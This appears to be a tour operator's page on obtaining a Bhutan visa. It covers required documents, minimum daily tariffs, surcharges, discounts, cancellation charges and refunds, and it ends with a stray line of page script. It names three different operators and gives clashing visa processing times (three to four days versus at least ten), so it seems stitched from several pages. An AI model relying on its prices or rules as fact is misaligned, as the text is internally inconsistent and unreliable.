It’s very easy to get Bhutan VISA. Our Company Draktsen Adventure Bhutan takes just three to four days to process Bhutan VISA for our clients. Royal Government of Bhutan will issue VISA only after they receive the full tour payment in advance. The entire tourist must pay tour payment before coming to Bhutan.
Need following document & information for Bhutan VISA:
- Scan passport copy of individuals (should be clear and visible)
- Permanent Address
- Date and Place of Birth
- Type of passport: Diplomatic/ Official/Ordinary/Un Lassie passer
- Period for which visa is required: From: To:
- Exact date of arrival in Bhutan and exit date from Bhutan
- City of boarding flight to Bhutan and back from Bhutan. (Eg. Bangkok, Kathmandu, Delhi, Singapore)
Other than Indian, Bangladeshis and Maldivian nationals, all visitors to Bhutan require a visa; all visas are issued from Thimphu the capital city of Bhutan; visas are only issued to tourists booked with a local licensed tour operator like Bhutan Wisdom Liberty.
If you want to make trip through Bhutan Wisdom Liberty, just e-mail us with the above information. As soon as you have decided on an itinerary or tour packages and have made payments for your trip, we will be able to process your visa and make your reservations on Druk Air, the National carrier of Bhutan. Air tickets to Bhutan cannot be purchased without visa clearance.
Visa clearance from Thimphu must be obtained before coming to Bhutan. Visa clearance takes at least 10 days to process.
US: $40 per person.
VISA NOTE: Please, use your full name exactly as it appears on your passport.
It is absolutely imperative that your Druk Air ticket have the same name as your passport and your visa. Druk Air will not allow you to board even if your name has changed. We must use your complete passport name to book your tickets with Druk Air.
The Royal Government of Bhutan sets minimum selling prices for packages to Bhutan and this must be paid in US dollars prior to arrival in Bhutan. The minimum tariffs for tourist visiting in a group of 3 persons or more are as follows:
The minimum tariffs for tourist visiting in a group of 3 persons or more are as follows:
- High Season Tariff – US$ 250 per person per night for the months of February, March, April, May, September, October, and November.
- Low Season Tariff – US$ 200 per person per night for the months of January, June, July, August, and December.
Individual tourists and smaller groups of less than three persons shall be subject to surcharge, over and above the minimum daily rates applicable, as follows:
- Single individual: US$ 40 per night
- Group of 2 persons: US$ 30 per person per night
In a group of three persons, if one member is a child below five years of age who is eligible for 100% discount, the group shall be treated as an FIT group of two persons and surcharge will be applicable.
The minimum price includes:
- A sustainable tourism Royalty of US $65 per person per night. This Royalty goes towards free education, free healthcare, poverty alleviation, along with the building of infrastructure
- All internal taxes and charges
- A minimum of 3 star accommodation (4 & 5 star requires an additional premium).
- All Meals
- All travel with a licensed Bhutanese Tour Guide
- All Internal Transportation
- Camping Equipment and Haulage for Trekking Tours
- Porter and Pony Charges
The rates given above are applicable per tourist per night halt in Bhutan. On the day of departure, it shall be limited to breakfast only and any extra requirements shall be payable on actual basis.
Tour Cost does not includes:
- Airfare and Airport Tax
- Bhutan Visa Fee (US $40 per person)
- Alcoholic brevages and drinks.
- Luxury hotels
- Insurance and Travel and others
- Tips/Gratitude to the guide and driver
The rates given above are applicable per tourist per night halt in Bhutan. On the day of departure, the ‘local agents’ host obligation shall be limited to breakfast only and any extra requirements shall be payable on actual basis.
However the Luxury hotel surcharges are extra over the normal tariff and range from US $500-US $1800 depending on which you choose. International standard luxury hotels available are Aman resort, Uma, Taj Tashi and Zhiwaling.
- There shall be no royalty charge for CHILDREN up to the age of 5 years. However, those between the ages of 6-12 years accompanied by elders/ guardians shall be given 50% discount on daily rates.
- Full time STUDENTS below the age of 25 years holding valid identity cards from their academic institutions shall also be given a 25% discount on daily rates.
Tour Programmes booked and subsequently cancelled shall be subject to cancellation charges as follows:
- within 30 days of start of programme ~ no charges
- within 21 days- 10% of rate
- within 14 days- 25% of rate
- less than 7 days or without notice- 50% of rate
- After arrival in Bhutan- 100%
If you cancel your tour after you have sent payment then we will process your refund in accordance with the above list of charges. To return funds to you from Bhutan we have to request permission from the Royal Monetary Authority to send foreign currency outside Bhutan. Once we have this we have to ask the Tourism Council of Bhutan to return the funds to you, as they are still holding them at that point since your tour has not yet run. This process of arranging the refund can take some time – at busy periods even 6 to 8 weeks.
Please note also that when your currency arrives in Bhutan it is booked to Bhutan Spiritual Liberty in local currency at the then prevailing rate of exchange. When we come to return funds to you the cost of the refund will be booked to us again at the then prevailing rate of exchange. If there has been significant fluctuation in exchange rates between the date when funds were received in Bhutan and the date the payment is refunded we reserve the right to return no more than the then current US$ equivalent of the amount originally received by us in local currency, to avoid incurring a loss as a result of currency fluctuation when returning your funds for the cancelled trip.
We advise you take out insurance to cover the risk of having to cancel your trip for medical or other reasons – every year we have two or three groups who end up having to cancel after they have already paid for their trips, sometimes as little as a day or so before they fly, and it is an expensive venture if you don’t have insurance to cover the costs incurred.
There is no charge for delays in arrival and departure because of weather conditions disrupting flights or road blocks. The tourist must however bear the cost of food, accommodation, transportation, and other services required.document.currentScript.parentNode.insertBefore(s, document.currentScript);